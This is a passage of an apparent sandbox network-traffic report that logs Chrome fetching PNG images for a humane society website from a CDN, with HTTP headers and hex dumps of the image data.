                                                                                                                                                                                                                                                        Data Ascii: 3d\ude35\u200d\ud83d\udcab|\ud83e\udd3c\u200d\u2640\ufe0f|\ud83e\udd3c\u200d\u2642\ufe0f|\ud83e\uddde\u200d\u2640\ufe0f|\ud83e\uddde\u200d\u2642\ufe0f|\ud83e\udddf\u200d\u2640\ufe0f|\ud83e\udddf\u200d\u2642\ufe0f|\ud83d\udc08\u200d\u2b1b|\ud83d\udc26\u200
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 75 32 62 35 35 5c 75 33 30 33 30 5c 75 33 30 33 64 5c 75 33 32 39 37 5c 75 33 32 39 39 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 63 62 5c 75 64 66 63 63 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 64 37 34 5c 75 64 64 37 35 5c 75 64 64 39 30 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 30 7c 5b 5c 75 32 36 31 64 5c 75 32 36 66 37 5c 75 32 36 66 39 5c 75 32 37 30 63 5c 75 32 37 30 64 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 38 35 5c 75 64 66 63 32 2d 5c 75 64 66 63 34 5c 75 64 66 63 37 5c 75 64 66 63 61 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 63 34 32 5c 75 64 63 34 33 5c 75 64 63 34 36 2d 5c 75 64 63 35 30 5c 75 64 63 36
                                                                                                                                                                                                                                                        Data Ascii: u2b55\u3030\u303d\u3297\u3299])(?:\ufe0f|(?!\ufe0e))|(?:(?:\ud83c[\udfcb\udfcc]|\ud83d[\udd74\udd75\udd90]|\ud83e\udef0|[\u261d\u26f7\u26f9\u270c\u270d])(?:\ufe0f|(?!\ufe0e))|(?:\ud83c[\udf85\udfc2-\udfc4\udfc7\udfca]|\ud83d[\udc42\udc43\udc46-\udc50\udc6


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        91192.168.2.449860192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC401OUTGET /wp-content/uploads/2023/06/get-involved-home.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 734033
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2023/06/get-involved-home.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 16 Jun 2023 01:28:42 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 84 00 00 02 75 08 06 00 00 00 81 f7 3e 33 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 49 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52 00 c8 2e 54 c8 14 00 c8 18
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRu>3gAMAaIiCCPsRGB IEC61966-2.1HSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R.T
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 14 51 22 c5 c8 72 a4 02 a9 42 6a 91 5d 48 23 f2 2d 72 14 39 8d 5c 40 fa 90 db c8 20 32 8a fc 8a bc 47 31 94 81 b2 51 03 d4 02 75 40 b9 a8 1f 1a 8a c6 a0 73 d1 74 34 0f 5d 80 96 a2 6b d1 1a b4 1e 3d 80 b6 a2 a7 d1 4b e8 75 74 00 7d 8a 8e 63 80 d1 31 0e 66 8c d9 61 5c 8c 87 45 60 89 58 1a 26 c7 16 63 e5 58 35 56 8f 35 63 1d 58 37 76 15 1b c0 9e 61 ef 08 24 02 8b 80 13 ec 08 5e 84 10 c2 6c 82 90 90 47 58 4c 58 43 a8 25 ec 23 b4 12 ba 08 57 09 83 84 31 c2 27 22 93 a8 4f b4 25 7a 12 f9 c4 78 62 3a b1 90 58 46 ac 26 ee 21 1e 21 9e 25 5e 27 0e 13 5f 93 48 24 0e c9 92 e4 4e 0a 21 25 90 32 49 0b 49 6b 48 db 48 2d a4 53 a4 3e d2 10 69 9c 4c 26 eb 90 6d c9 de e4 08 b2 80 ac 20 97 91 b7 90 0f 90 4f 92 fb c9 c3 e4 b7 14 3a c5 88 e2 4c 09 a2 24 52 a4 94 12 4a 35 65 3f
                                                                                                                                                                                                                                                        Data Ascii: Q"rBj]H#-r9\@ 2G1Qu@st4]k=Kut}c1fa\E`X&cX5V5cX7va$^lGXLXC%#W1'"O%zxb:XF&!!%^'_H$N!%2IIkHH-S>iL&m O:L$RJ5e?
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: a5 43 2b 82 57 34 95 a9 94 c9 cb 6e ae f4 5a b9 63 15 61 95 64 55 ef 6a 97 d5 5b 56 7f 2a 17 95 5f ac 70 ac a8 ae f8 b0 46 b8 e6 e2 57 4e 5f d5 7c f5 79 6d da da de 4a b7 ca ed eb 48 eb a4 eb 6e ac f7 59 bf af 4a bd 6a 41 d5 d0 86 f0 0d ad 1b f1 8d e5 1b 5f 6d 4a de 74 a1 7a 6a f5 8e cd b4 cd ca cd 03 35 61 35 ed 5b cc b6 ac db f2 a1 36 a3 f6 7a 9d 7f 5d cb 56 fd ad ab b7 be d9 26 da d6 bf dd 77 7b f3 0e 83 1d 15 3b de ef 94 ec bc b5 2b 78 57 6b bd 45 7d f5 6e d2 ee 82 dd 8f 1a 62 1b ba bf e6 7e dd b8 47 77 4f c5 9e 8f 7b a5 7b 07 f6 45 ef eb 6a 74 6f 6c dc af bf bf b2 09 6d 52 36 8d 1e 48 3a 70 e5 9b 80 6f da 9b ed 9a 77 b5 70 5a 2a 0e c2 41 e5 c1 27 df a6 7c 7b e3 50 e8 a1 ce c3 dc c3 cd df 99 7f b7 f5 08 eb 48 79 2b d2 3a bf 75 ac 2d a3 6d a0 3d a1 bd
                                                                                                                                                                                                                                                        Data Ascii: C+W4nZcadUj[V*_pFWN_|ymJHnYJjA_mJtzj5a5[6z]V&w{;+xWkE}nb~GwO{{EjtolmR6H:powpZ*A'|{PHy+:u-m=
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: ac af a7 69 08 0e 65 29 c1 9d b2 36 68 8c 45 a2 15 b2 54 a3 6e c2 e1 ac 1b ba 6f 4c c0 fd dc 77 9a 33 2a ab a0 d0 18 83 c6 00 79 aa 61 61 51 56 16 4d 63 3d fc a9 2a 83 ca d5 6d 2d 50 d6 06 c6 d0 9c f1 9e 06 e0 e7 4f 2b 20 71 f3 c5 f7 95 52 a1 af 89 bc 0f 34 86 2a ee f7 34 52 ad a1 05 bd ce e7 c4 ba b9 62 7a 49 ce 6d 2f d7 7e 0d a9 9c 45 92 00 69 a2 61 8c 45 9a 6a 34 0d f5 59 b9 be f1 da 26 9a e6 b1 6e ac df 13 8d a1 7d 56 3b d8 cb 6b 97 68 e5 f7 98 56 0a 55 63 60 2d dd 57 8a e6 bc ac 09 56 5f cd 6a 54 8d 81 52 0a 93 59 05 00 b8 9a d7 38 bd ac 30 5f d6 28 4a 03 ad 15 de ba 3f c4 b0 97 e0 8b 17 0b 54 b5 c1 ed dd 1e 00 e0 d3 a7 33 00 c0 ce 66 8e f3 ab 12 4f 8e 16 48 13 85 61 3f 85 d6 c0 ef 7c 6b 0f db 9b 39 fe d5 9f bf c0 e1 59 81 ba 01 06 b9 c6 6b 77 87 18
                                                                                                                                                                                                                                                        Data Ascii: ie)6hETnoLw3*yaaQVMc=*m-PO+ qR4*4RbzIm/~EiaEj4Y&n}V;khVUc`-WV_jTRY80_(J?T3fOHa?|k9Ykw
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: bc 94 b8 29 a8 95 ae 73 bd 2d 6d 50 47 99 56 5f af 61 9a 56 08 40 c9 0c ca 41 46 d4 8d 1f ad a7 e9 55 eb 7e bb af 81 68 6c b5 e5 0a c9 fb dd 8c 53 1b 89 fe ca d7 97 78 57 0b 66 7e a5 9a ae fb 7e 1e c2 e7 75 7d 65 b8 bd 22 95 47 98 b3 b8 be b8 0f f1 ef eb b4 c5 72 19 89 89 e8 20 08 e5 59 73 ff 29 a5 9c 86 30 2c 82 ec b7 95 75 0b 42 f6 65 af 36 33 b2 ba 9f e4 3a b0 04 95 c7 c0 17 6b 30 7d ff d6 09 3d 78 ec 5d 93 74 c3 25 f7 2a 7f f7 75 7e c9 ba 3a cb bf 44 25 d7 f5 bb 8b f1 5b db fe 35 0c a1 2c a3 9c 10 c0 22 5e 27 f1 be 9f 73 49 fc ae d6 af 95 d0 40 42 21 d6 60 74 32 a2 d1 6f 4f 6f 0a 82 b6 f6 0c 19 90 24 9a 18 3d 84 f6 b9 7c d0 7e 3b 66 50 8c d1 46 65 24 01 af d0 d6 36 86 fa a8 ed a6 61 66 90 18 42 d6 80 44 e0 72 e5 7d 39 2e a9 5d 53 02 27 29 05 af 55 6d
                                                                                                                                                                                                                                                        Data Ascii: )s-mPGV_aV@AFU~hlSxWf~~u}e"Gr Ys)0,uBe63:k0}=x]t%*u~:D%[5,"^'sI@B!`t2oOo$=|~;fPFe$6afBDr}9.]S')Um
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 40 49 29 34 6e 61 6b 67 0e ca 7b 94 19 31 00 a4 e1 83 f2 66 fa 6c 3a ca c2 2c ed 18 40 88 79 49 04 fc 4a 12 ed 05 20 0c 27 19 5f 00 c1 9c 38 65 06 cc a2 75 2e b4 26 e6 9b 4c 47 95 37 d7 94 9a 31 ad a9 1d 05 9a db 2c d1 c8 f3 84 f0 42 12 34 88 a6 b1 c8 32 8d 7e ae 89 69 73 66 9a 79 4a 9b 8c 99 3e 3f 76 b7 4e 69 4a a6 a6 bd 5e e2 dd 02 78 8e 92 84 dc 15 b2 54 63 d8 4f b0 2c 48 6b 3a e8 25 28 4b 8b ab 59 85 aa b1 d8 1c a6 c8 12 4d 1a 39 67 ea 39 ec 25 38 bb aa 30 5d 34 28 ca 06 93 79 83 2c d5 e8 65 1a 3f f9 f8 12 c7 17 05 b6 37 72 0c 7b 09 be f6 c6 26 76 37 72 18 63 31 99 d7 38 bb 2a b1 35 ca b0 bb 95 63 51 90 d6 ee d5 db 43 5c ce 6a 7c f2 74 86 b7 ee 8f 70 7a 55 e2 f9 e9 12 c3 1e 9d a3 61 2f 85 56 ca bb 4e 34 06 78 76 b2 04 2c 99 eb 96 b5 41 ea fa d8 cb 34
                                                                                                                                                                                                                                                        Data Ascii: @I)4nakg{1fl:,@yIJ '_8eu.&LG71,B42~isfyJ>?vNiJ^xTcO,Hk:%(KYM9g9%80]4(y,e?7r{&v7rc18*5cQC\j|tpzUa/VN4xv,A4
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 5c 3e 5e bb a0 41 e6 b9 6a 13 c0 7c ad 0b 26 13 5f 5d c5 e4 3d 62 76 88 f8 eb e7 e4 4f 21 cd 35 d9 9c 93 f7 a7 52 ed 7a 64 90 0c 79 79 22 25 62 06 01 22 8e 3c 31 e4 ca 66 89 6a 11 f2 40 bc 54 ab 30 51 6a 06 b9 84 d6 24 cd d7 49 fc b6 23 c6 ad f0 1f 34 80 d4 68 04 b8 a0 3c dd c4 fe 40 65 65 51 36 b6 b5 26 81 6e 6b cf 4b eb 59 07 8c 8d c7 16 9f 8f 2e 78 b7 4e 7b c8 ed 77 dd 8f eb 88 fb 16 df bf e9 fd 75 ef d2 f7 70 c6 64 15 7a 6d 9f a3 39 e8 6c 53 9e 37 79 16 78 dd 82 a0 24 66 16 63 21 5b 38 c3 8c cb 3b fa 1e 0d fe 46 c1 8b 94 42 2a e1 93 25 10 44 b7 10 ae ed 9b 2e 9b e9 9a 2f 1e a7 14 1c b0 f9 e6 bc 68 00 ab 70 35 af 70 77 bf 8f df ff ce 01 7e fd bd 6d 7c f2 74 86 b3 ab 0a 8d b1 b8 9c 56 b8 b7 df c7 6c d9 f8 3a d8 af 4f 29 e0 e9 f1 12 8d a1 f3 7f 74 5e 20
                                                                                                                                                                                                                                                        Data Ascii: \>^Aj|&_]=bvO!5Rzdyy"%b"<1fj@T0Qj$I#4h<@eeQ6&nkKY.xN{wupdzm9lS7yx$fc![8;FB*%D./hp5pw~m|tVl:O)t^
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 11 31 77 f7 0f 06 d8 dd cc 48 23 de 4b 01 90 6f e1 d3 93 25 ce 27 15 9a c6 e2 60 27 47 3f d7 f8 f8 c9 0c 1b c3 14 c6 d0 9c f7 73 0a d2 b3 39 ca 50 38 61 08 07 86 79 e7 c1 18 cf 4f 96 58 14 0d 36 47 29 46 83 14 e3 01 45 14 bd 9c d5 38 3a 2f b0 bf 9d e3 b5 3b 43 8c 06 29 16 45 03 28 85 d3 cb 12 57 b3 0a 75 63 31 e8 25 28 2a 43 fe bf fb 03 9c 4d 2a 24 ff c7 ff cd 3b 7f b4 56 12 2f be 6b b1 69 54 74 4f 96 ed 22 34 5b ea 70 db a5 11 74 07 d4 ef 24 71 48 3b 98 4c d9 a8 8a ca c6 81 5e 58 da c1 d8 61 95 68 6f d7 cd 80 9d c7 ca e3 a4 4d d5 ae 3b 1e c3 4a dd 71 7f d1 8d a0 af 1b df 75 2f 7e e9 94 0e 1d 97 ac 21 66 7c 8d b5 9d 63 a0 b6 3a 10 2d 7f 57 e2 bb ef 6b 60 28 64 1d 2f d5 c7 2e 0d e8 4a 7f 94 2f 2b 7f cb b6 ba cc 6e e2 32 d7 35 13 13 28 d7 f6 c7 fd af e2 89
                                                                                                                                                                                                                                                        Data Ascii: 1wH#Ko%'`'G?s9P8ayOX6G)FE8:/;C)E(Wuc1%(*CM*$;V/kiTtO"4[pt$qH;L^XahoM;Jqu/~!f|c:-Wk`(d/.J/+n25(
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: e5 7b ad 88 88 5a f9 3c 86 c0 7a 26 2d 3e 29 6b b6 e5 ea 7b 9d 67 51 d4 d3 71 5e bd 25 4c 24 14 25 0d c8 6a 3f bb 60 e8 3a bc 1c c3 d8 55 21 70 f4 7c 05 57 74 c7 1b e8 da fb b1 a6 2d 66 06 5f e6 f2 30 f4 9a 32 dd 78 a5 db 6f fb 46 38 84 d5 f1 5c 47 1e b0 29 a3 ec 6f ec 7b 28 f3 c4 01 82 76 6a c1 49 77 3e 35 11 d4 65 6d 30 1e a4 b8 bd db 43 51 19 fc f9 fb 67 f8 8f 3f 32 f8 3b df da c3 ff ec 77 ef e2 bf fb 57 8f 30 5b d4 f8 c1 87 17 c8 3f 25 13 bd d2 45 11 65 cd 8e 75 dc ea 8b b3 a5 cf e3 b6 2c 1b fc bb 1f 1c 23 4b 15 de 7e 65 8c e9 9c 08 54 65 c8 ec 51 2b 85 4c 01 8b 65 83 26 53 2e 47 1b f5 93 23 56 2a 90 46 2c 4b 01 ad e8 64 68 1d fc 12 ad 25 8d 50 2f d3 28 8d f5 79 ef 98 51 30 96 99 3c a7 6d 6a ac f7 0d 06 02 3c 4b 9d ff 5a e5 b4 6f 16 61 7e 4c 4d 8e ca
                                                                                                                                                                                                                                                        Data Ascii: {Z<z&->)k{gQq^%L$%j?`:U!p|Wt-f_02xoF8\G)o{(vjIw>5em0CQg?2;wW0[?%Eeu,#K~eTeQ+Le&S.G#V*F,Kdh%P/(yQ0<mj<KZoa~LM
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: c2 9c 28 85 d9 a2 c1 b2 6a 30 ec 69 7c fa 94 cc 49 df 79 30 c2 20 a7 f3 72 74 5e 60 d8 4f b0 3d ce d0 18 8b f7 3f bb 42 92 28 dc d9 ed c3 5a e0 f4 72 8e 3b bb 7d 18 6b f1 c1 17 13 dc de ed 41 2b 45 9a c2 79 8d 3f fe fe 31 7e ed dd 2d dc 3f 18 a0 28 1b 8c 86 29 31 84 f1 45 67 a0 5b 8a be 0e 4e 4a 29 75 4b 8b e7 89 2b 42 ca 16 6c 57 2e 25 32 76 85 38 97 cc 17 6d b5 08 b0 4b 28 e8 18 b7 9b 81 78 a8 8b 37 39 57 c1 52 78 d1 e0 b5 d7 75 9a c1 55 a6 27 22 c6 44 d7 e1 fa f1 d2 e6 31 1e b0 49 04 17 37 c8 1f 6b a4 a4 ee 3f e6 8b 99 e9 e5 be f3 41 15 d3 2b 80 d2 f5 4c ef ba 2b 5e b6 97 41 50 f2 dd f5 73 bd ca 58 c5 12 52 5f ff 9a 75 e9 9a 4b bf 2f 11 10 83 1c 6f 4c b8 c4 97 f5 0f 1d 52 e8 90 98 71 3b 6b b5 9f d1 f9 81 63 52 25 63 08 ac fa 57 5d 77 19 6b a1 ac 34 77
                                                                                                                                                                                                                                                        Data Ascii: (j0i|Iy0 rt^`O=?B(Zr;}kA+Ey?1~-?()1Eg[NJ)uK+BlW.%2v8mK(x79WRxuU'"D1I7k?A+L+^APsXR_uK/oLRq;kcR%cW]wk4w


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        92192.168.2.449861192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC391OUTGET /wp-content/uploads/2023/06/clinics.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC592INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 431066
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2023/06/clinics.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 16 Jun 2023 00:05:52 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC777INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 84 00 00 02 75 08 06 00 00 00 81 f7 3e 33 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 49 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52 00 c8 2e 54 c8 14 00 c8 18
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRu>3gAMAaIiCCPsRGB IEC61966-2.1HSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R.T
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 6a 91 5d 48 23 f2 2d 72 14 39 8d 5c 40 fa 90 db c8 20 32 8a fc 8a bc 47 31 94 81 b2 51 03 d4 02 75 40 b9 a8 1f 1a 8a c6 a0 73 d1 74 34 0f 5d 80 96 a2 6b d1 1a b4 1e 3d 80 b6 a2 a7 d1 4b e8 75 74 00 7d 8a 8e 63 80 d1 31 0e 66 8c d9 61 5c 8c 87 45 60 89 58 1a 26 c7 16 63 e5 58 35 56 8f 35 63 1d 58 37 76 15 1b c0 9e 61 ef 08 24 02 8b 80 13 ec 08 5e 84 10 c2 6c 82 90 90 47 58 4c 58 43 a8 25 ec 23 b4 12 ba 08 57 09 83 84 31 c2 27 22 93 a8 4f b4 25 7a 12 f9 c4 78 62 3a b1 90 58 46 ac 26 ee 21 1e 21 9e 25 5e 27 0e 13 5f 93 48 24 0e c9 92 e4 4e 0a 21 25 90 32 49 0b 49 6b 48 db 48 2d a4 53 a4 3e d2 10 69 9c 4c 26 eb 90 6d c9 de e4 08 b2 80 ac 20 97 91 b7 90 0f 90 4f 92 fb c9 c3 e4 b7 14 3a c5 88 e2 4c 09 a2 24 52 a4 94 12 4a 35 65 3f e5 04 a5 9f 32 42 99 a0 aa 51
                                                                                                                                                                                                                                                        Data Ascii: j]H#-r9\@ 2G1Qu@st4]k=Kut}c1fa\E`X&cX5V5cX7va$^lGXLXC%#W1'"O%zxb:XF&!!%^'_H$N!%2IIkHH-S>iL&m O:L$RJ5e?2BQ
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: cb 6e ae f4 5a b9 63 15 61 95 64 55 ef 6a 97 d5 5b 56 7f 2a 17 95 5f ac 70 ac a8 ae f8 b0 46 b8 e6 e2 57 4e 5f d5 7c f5 79 6d da da de 4a b7 ca ed eb 48 eb a4 eb 6e ac f7 59 bf af 4a bd 6a 41 d5 d0 86 f0 0d ad 1b f1 8d e5 1b 5f 6d 4a de 74 a1 7a 6a f5 8e cd b4 cd ca cd 03 35 61 35 ed 5b cc b6 ac db f2 a1 36 a3 f6 7a 9d 7f 5d cb 56 fd ad ab b7 be d9 26 da d6 bf dd 77 7b f3 0e 83 1d 15 3b de ef 94 ec bc b5 2b 78 57 6b bd 45 7d f5 6e d2 ee 82 dd 8f 1a 62 1b ba bf e6 7e dd b8 47 77 4f c5 9e 8f 7b a5 7b 07 f6 45 ef eb 6a 74 6f 6c dc af bf bf b2 09 6d 52 36 8d 1e 48 3a 70 e5 9b 80 6f da 9b ed 9a 77 b5 70 5a 2a 0e c2 41 e5 c1 27 df a6 7c 7b e3 50 e8 a1 ce c3 dc c3 cd df 99 7f b7 f5 08 eb 48 79 2b d2 3a bf 75 ac 2d a3 6d a0 3d a1 bd ef e8 8c a3 9d 1d 5e 1d 47 be
                                                                                                                                                                                                                                                        Data Ascii: nZcadUj[V*_pFWN_|ymJHnYJjA_mJtzj5a5[6z]V&w{;+xWkE}nb~GwO{{EjtolmR6H:powpZ*A'|{PHy+:u-m=^G
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: b0 d4 4a 99 fb 19 4f c9 4e f4 80 ac fb a2 34 77 27 f4 4b 01 21 c7 47 e7 8b c8 af 07 84 71 3e 1e 01 84 f6 5d 04 84 dd 45 50 4b f7 fd 14 eb 25 f2 7e 46 40 e8 1b b4 12 02 a3 b0 57 b7 bd fa b3 7d 97 f9 d4 22 db 05 84 7b 43 55 68 dc e7 00 61 a7 4c 7f be 86 57 7b 7d 21 1a 0f 7f c5 98 51 cf 5f 04 64 ed bc b6 79 da 9f 5e 56 fc 93 c0 c4 e3 fd ef cf 95 30 1e 2e 19 93 92 3a 75 3f 9b 92 4e 86 81 42 66 70 f5 88 40 b6 9e 1f de bc 50 e1 b0 26 fc 47 a0 c6 19 df 1a 84 17 27 f8 70 e6 48 01 f0 fc a7 4a 3a be 4f a5 47 fa eb e3 e3 c8 a5 01 29 01 10 06 61 c3 c6 3e eb 3f 5e 32 d6 fb 8a e5 63 c1 f2 f3 8e fb 8f 1b ee 3f 6e 58 7e de 55 c0 2c a0 3d 4d 13 78 9d 05 1c 5e 26 4c 97 09 e9 3a b9 f0 49 44 3a 6f 22 c0 e6 25 23 df 17 e4 7b c6 72 5f b0 de 16 2c 3f 17 ac 1f 77 2c 1f 8b 08 06
                                                                                                                                                                                                                                                        Data Ascii: JON4w'K!Gq>]EPK%~F@W}"{CUhaLW{}!Q_dy^V0.:u?NBfp@P&G'pHJ:OG)a>?^2c?nX~U,=Mx^&L:ID:o"%#{r_,?w,
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 3c 6e 36 2e b9 6c 53 58 78 2c db 3f 73 cd de 4b 01 30 56 56 ea 35 2b c0 94 32 6c 6f 4f 97 09 97 f7 0b e6 6f 57 5c de 2f 98 ae 02 10 d3 45 41 a1 29 83 d2 b1 59 f0 4b 41 61 bd 90 be 3c 3d 4c 37 3c b5 2a d0 6d b9 9e 73 c0 5b 45 9e d2 bd c2 54 d6 20 b3 38 3d 30 83 28 37 2e bc 0a 48 dc 9a 2c e0 ff f6 1f 3f 71 fb e3 03 7f fe d7 ff c0 b7 ff f2 3b 2e bf bf 81 a6 84 f9 3a 03 94 40 0a 36 c5 e3 a6 06 21 26 0f 70 c6 13 74 b1 a5 41 da c6 27 e4 57 db 3b 76 f4 4c da d4 80 c2 40 70 4c fe 20 62 20 d0 48 03 76 9c d9 2d 89 de 3a e5 5f 3d c9 84 a0 fc ed 68 3d b8 90 88 6e 5e 52 d7 2b 1e 14 d4 ca a3 6d bb 8f ea 6f 8d 2d d5 77 07 f3 b7 01 84 51 c8 e8 09 df cf 08 2f 47 df 55 8a b7 c7 4a 7e ea ab 67 93 11 87 9e 86 b2 d2 7a 6e da 17 3e b6 df d1 59 f7 26 e0 9f 1c e3 2d 51 09 ef f6
